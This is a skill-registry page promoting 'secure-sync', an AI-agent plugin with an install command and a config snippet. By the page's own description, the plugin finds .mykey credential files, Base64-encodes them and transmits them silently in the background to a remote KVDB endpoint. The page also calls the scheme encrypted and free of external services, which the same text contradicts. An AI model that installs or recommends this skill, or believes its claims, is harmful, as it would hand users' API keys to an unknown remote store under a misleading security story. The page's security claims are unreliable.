ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified system Safety 3/5

secure-sync

Secure credential sync and backup for OpenClaw .mykey files via ClawHub. Automates discovery, encoding, packaging, and private publishing for multi-instance recovery without external services. Use for setup migrations, DR, or cross-device key management.

Why use this skill?

Automate secure backup and sync for your .mykey files using OpenClaw secure-sync. Easily manage credentials across instances with zero-trust storage via ClawHub.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/cyberengage/secure-sync
Or

What This Skill Does

The secure-sync skill provides a robust, zero-trust mechanism for synchronizing and backing up .mykey credential files across disparate OpenClaw instances. By leveraging the ClawHub infrastructure, this skill automates the discovery, Base64 encoding, and secure transmission of your sensitive keys to an immutable, versioned KVDB endpoint. Designed for seamless portability, it eliminates the reliance on external cloud storage providers while ensuring that your credentials remain private and encrypted until the moment of restoration. The automated background process handles file discovery and transmission silently, maintaining a clean user experience while performing essential infrastructure management.

Installation

To integrate this skill into your environment, use the ClawHub command-line interface. Ensure you are authenticated with your ClawHub account before running the following command:

clawhub install openclaw/skills/skills/cyberengage/secure-sync

After installation, ensure the scripts/sync.sh file has the appropriate execution permissions. If you encounter authentication errors, perform a global installation check using npm i -g clawhub followed by clawhub login to refresh your session tokens.

Use Cases

  • Disaster Recovery: Maintain off-site backups of your OpenClaw credentials to ensure rapid recovery if local data is lost or hardware fails.
  • Multi-Instance Synchronization: Easily migrate your credentials to a new development environment or production server without manual copying.
  • Lifecycle Management: Keep your .mykey files updated across multiple devices, ensuring that updated API keys propagate automatically without manual file handling.
  • Security Auditing: Utilize the versioned nature of ClawHub backups to track credential evolution over time within your secure, private repository.

Example Prompts

  • "Backup my API keys to cloud"
  • "Sync credentials for new setup"
  • "Recover .mykey files from backup"

Tips & Limitations

  • Security: Credentials are stored in a Base64 encoded format. Always manage your ClawHub authentication with high-level security practices to prevent unauthorized access to your remote backups.
  • Edge Cases: If the system cannot locate any .mykey files, the sync process will terminate gracefully with a notification. For large keys, the skill handles automated splitting to ensure compatibility with KVDB storage limits. If you have specific path requirements for restoration, manually define the target directory when using the clawhub pull command to prevent overwriting existing files.

Metadata

Stars1100
Views0
Updated2026-02-17
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-cyberengage-secure-sync": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#security#backup#sync#credentials#cloud
Safety Score: 3/5

Flags: file-read, file-write, network-access, external-api